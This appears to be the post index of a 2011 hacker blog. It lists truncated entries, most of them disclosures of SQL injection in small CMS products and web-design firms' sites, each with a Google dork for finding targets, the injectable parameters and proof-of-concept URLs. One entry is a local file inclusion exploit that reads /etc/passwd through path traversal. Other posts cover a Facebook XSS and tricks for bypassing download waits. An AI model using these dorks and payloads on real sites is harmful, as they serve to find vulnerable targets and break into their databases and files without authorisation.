Wednesday, December 21, 2011

AIX IP Stack Tuning

I had a problem during an AIX server assessment/hardening recently. After a few Google searches, I found this great blog, http://www.cymru.com, which helps a lot in my assessment. 1. TCP send and receive spaces The TCP send and receive spaces...

Monday, November 14, 2011

Wednesday, November 2, 2011

Saturday, October 22, 2011

dreams & ideas web design multiple vulnerabilities

Title : dreams & ideas web design multiple vulnerabilities Found : 22 October 2011 Web : http://www.dreamsandideas.com [sql] 1 - products.php?CatID=[sql] 2 - news_details.php?nid=[sql] 3 - success_story_details.php?sid=[sql] 4...

Wednesday, October 12, 2011

Monday, August 22, 2011

Run the Application as Administrator Just by a Click!

How to Set Our Application to Always Run as Administrator in Windows 7 ----------------------------------------------------------------------------------------------------- 1 - Right-click the application that you...

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

Title : LASERnet CMS Vulnerable to SQL Injection Vendor : http://cms.lasernet.gr/index.php?lang=en Dork : intext:"Powered by Lasernet" Category: WebApps http://localhost.com/index.php?id=[SQL] Demo: http://localhost.com/index.php?id=-1'...

CarRentals CMS Vulnerable to SQL Injection

Title : CarRentals CMS Vulnerable to SQL Injection Vendor : N/A Dork : intext:"Powered by CarRentals CMS" Category: WebApps http://localhost.com/*.php?id=[SQL] ~/POC/~ ------- http://localhost.com/book-offer.php?offer_id=-1'...

Thursday, August 4, 2011

shoma.net Web Design Vulnerable to Multiple SQL Injection

Title : shoma.net Web Design Vulnerable to Multiple SQL Injection Website : http://www.shoma.net/ Dork : Developed by Shoma.net Type : WebApps http://localhost.com/SubNews.cfm?NewsID=[SQL] http://localhost.com/details.cfm?TourID=[SQL]&categoryId=[SQL] http://localhost.com/Hotellist.cfm?starID=[SQL] http://localhost.com/index_show.asp?idbasic=[SQL] http://localhost.com/index_view.asp?idrecipie=[SQL] There...

Tuesday, July 26, 2011

Tuesday, July 5, 2011

4shared Downloader

How to use? 1 - Make sure you have an account at 4shared.com... just a free account :) 2 - Log in to your account 3 - Open a command prompt and just run this Python script :) Usage : 4shared.py Url 4 - It will open the...

Friday, July 1, 2011

Adf.ly Bypass

Hate waiting even 5 secs? Want to bypass the waiting time? It's easy. As an example, you want to download this: http://adf.ly/1wuNc Go to the link, and at the URL bar type this: javascript:showSkip(); The countdown will be skipped...

4shared Download Tricks

4shared Download Tricks So there are two tricks you can use to download a file from 4shared.com. Let's say we want to download this thing: http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html We can 1 - bypassing...

Unix Command in Windows???

Unix Command in Windows??? Yeah, there's a little secret that you might not know about Windows 7. We can use Unix commands in Windows without using Cygwin! Believe it? Let's look at it together. The name of this technology?...

Wednesday, June 15, 2011

Axel Accelerator for Windows

I googled a bit and found someone who shared this Axel accelerator for Windows users. Download here: http://www.mediafire.com/?wi8dw1hbaqinhfz Extract and just use it! Usage is like below. Usage: axel.exe [options] url1 [url2]...

Monday, June 6, 2011

Friday, June 3, 2011

Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection

Title : Acuity CMS Vulnerable to Blind SQL Injection Found by : p0pc0rn Dork : intext:"Powered by Acuity CMS." Web : http://www.acuitycms.com/ SQL Injection ---------------- http://www.site.com/browse.asp?page=[Blind...

Golden IT Solutions Web Design Vulnerable to SQL Injection

Title : Golden IT Solutions Web Design Vulnerable to SQL Injection Found by : p0pc0rn Dork : intext:"Developed By : Golden IT Solutions" SQL Injection ---------------- http://www.site.com/anypath.php?ID=[SQL] POC ---- http://www.site.com/memProfile.php?ID=-2800...

Saturday, May 21, 2011

New LFI Exploit found :)

New LFI Exploit found :) ------------------------- By p0pc0rn May 2011 Dork: inurl:"index.php?loc=subindex" Exploit : site.com/index.php?loc=../../../../../../../../../../../../../../../etc/passwd thanks -p0pc0...

Wednesday, May 11, 2011

New WallSpam Using Javascript in Facebook

New WallSpam Using Javascript in Facebook ------------------------------------------ If u notice a wallpost like this, NEVER EVER CLICK IT!! [spam]Not like Justin Biebier which always never say never.He's an idiot [/spam] Take...

Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PostgreSQL Injection

Title : Creatop Web Design Vulnerable to PostgreSQL Injection Vendor: http://www.creatop.com.au/ Found : by p0pc0rn Dork : intext:"by Creatop" filetype:cfm PostgreSQL Injection ------------------- http://www.victim.com/index.cfm?MenuID=[Injection] Example: http://www.victim.com/index.cfm?MenuID=80...

Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities

Title : PakCyber Web Design Multiple Vulnerabilities Found : by p0pc0rn Vendor: http://pakcyber.com/ Dork : intext:"Powered By PakCyber" Blind SQL Injection ------------------- http://www.victim.com/site.php?article_id=[Blindey] Eg:...

Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection

Title : ezeXs Web Design Vulnerable to SQL Injection Web : http://www.ezexs.com/ By : p0pc0rn Dork : intext:"Powered by ezexs.com" Microsoft Access SQL Injection ------------------------------ http://site.com/[type].asp?[id]=[SQL] Notes...

Site Developed by Magfiroh Vulnerable to SQL Injection

Title : Site Developed by Magfiroh Vulnerable to SQL Injection Filetype : ColdFusion Found by : p0pc0rn Dork : inurl:".cfm?judul=" SQL --- http://site.com/parameter.cfm?judul=[SQL] POC --- http://site.com/download_detail.cfm?judul=1' Live...

Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection

Title : eksi7 Web Design Vulnerable to Multiple SQL Injection Vendor: http://www.eksi7.com Found by : p0pc0rn Dork : inurl:"devam.asp?haber_id=" inurl:"kat_list.asp?kat_id=" intext:"tasarim ve programlama eksi7 web hizmetleri" intext:"design...

Monday, April 4, 2011

Sunday, April 3, 2011

Master Password in Firefox

Master Password in Firefox -------------------------- Some of us may have stored passwords for some sites in our browser. So, it's really important to set your master password in the Firefox browser. Why do we need to set the master...

Tuesday, March 29, 2011

New XSS at m.facebook.com

So, I noticed that there's a new XSS vulnerability found at Facebook by someone. I figured it out after I saw my friend update his Facebook status in the Indonesian language. So, what the attacker can do is, when a victim clicks the...

Wednesday, March 23, 2011

CAPSoft CMS Multiple Vulnerabilities

Title : CAPSoft CMS Multiple Vulnerabilities Vendor : http://www.capsoft.com.ar Found by : p0pc0rn SQL --- Vulnerable Parameters are Method = GET ------------ http://site.com/noticia.asp?id=[SQL] http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL] http://site.com/product.asp?intProdID=[SQL] http://site.com/productosporcategoria.asp?intCatalogID=[SQL] POC --- http://site.com/noticia.asp?id=1...

Inventory Mojo Software Vulnerable to Multiple SQL Injections

Title : Inventory Mojo Software Vulnerable to Multiple SQL Injections Found by : p0pc0rn Dork : intext:"Powered by Inventory Mojo Software." SQL --- Vulnerable Parameters are Method = GET ------------ categoria.asp producto.asp srubro.asp marca.asp Method...

Sunday, March 20, 2011

Shimbi CMS Vulnerable to Multiple SQL Injections

Title : Shimbi CMS Vulnerable to Multiple SQL Injections Vendor : http://www.shimbi.in/ Found by : p0pc0rn Dork : intext:"Powered By Shimbi CMS" SQL Injection in details.php parameter --------------------------------------- http://site.com/details.php?id=[sql] POC...